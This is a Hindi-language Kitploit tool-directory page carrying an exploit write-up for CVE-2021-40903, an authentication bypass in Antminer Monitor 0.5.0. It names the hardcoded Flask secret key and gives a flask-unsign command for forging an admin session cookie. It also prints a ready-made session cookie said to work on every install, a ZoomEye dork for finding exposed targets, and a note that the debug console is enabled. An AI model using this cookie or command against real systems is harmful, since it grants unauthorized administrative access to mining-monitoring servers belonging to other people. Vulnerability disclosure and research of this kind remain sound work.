Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
उपकरण/GitHubGitHub/vulnz/cve-2021-40903
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

रिपॉजिटरी देखें
34 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण शीर्षक: Antminer Monitor 0.5.0 - प्रमाणीकरण बाइपास

CVE: CVE-2021-40903

दिनांक: 09/06/2021

Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 शोषण लेखक: CQR.company / Vulnz.

विक्रेता होमपेज: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

सॉफ्टवेयर लिंक: https://github.com/anselal/antminer-monitor, https://soulis.tech/

संस्करण: 0.5.0

परीक्षित किया गया: Windows, Linux, Macos

यह सॉफ्टवेयर आमतौर पर antminers की निगरानी के लिए उपयोग किया जाता है और zoomeye (800), shodan (500) पर आसानी से पाया जा सकता है। फिलहाल यह सबसे लोकप्रिय antminer मॉनिटरिंग टूल है। Antminer Monitor में भेद्यता बैकडोर या फ्लास्क सर्वर में सेटिंग्स फ़ाइल में डेवलपर द्वारा की गई गलत कॉन्फ़िगरेशन के कारण मौजूद है।

सेटिंग्स फ़ाइल में एक पूर्वनिर्धारित गुप्त स्ट्रिंग है, जो यादृच्छिक रूप से उत्पन्न की जानी चाहिए, हालांकि यह इस बिल्ड में स्थिर है। 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

गुप्त कुंजी 'super secret key' है।

इस जानकारी के आधार पर हम प्राधिकरण बाइपास कुकीज़ बना सकते हैं।

सॉफ्टवेयर flask-unsing का उपयोग करके हम एक कुकी उत्पन्न कर सकते हैं जो आपको एडमिन एक्सेस प्रदान करेगी।

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" इसके अतिरिक्त आप फ्लास्क एप्लिकेशन के वेब इंटरफ़ेस तक पहुँचने के लिए इस सार्वभौमिक कुकी का उपयोग कर सकते हैं।

यह कुकी सभी सिस्टम पर "session" फ़ील्ड में काम कर सकती है।

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

इसके अलावा DEBUG = True है जिसका अर्थ है /console काम करता है, हालांकि इसे पिन की आवश्यकता है।

टूल डाउनलोड करें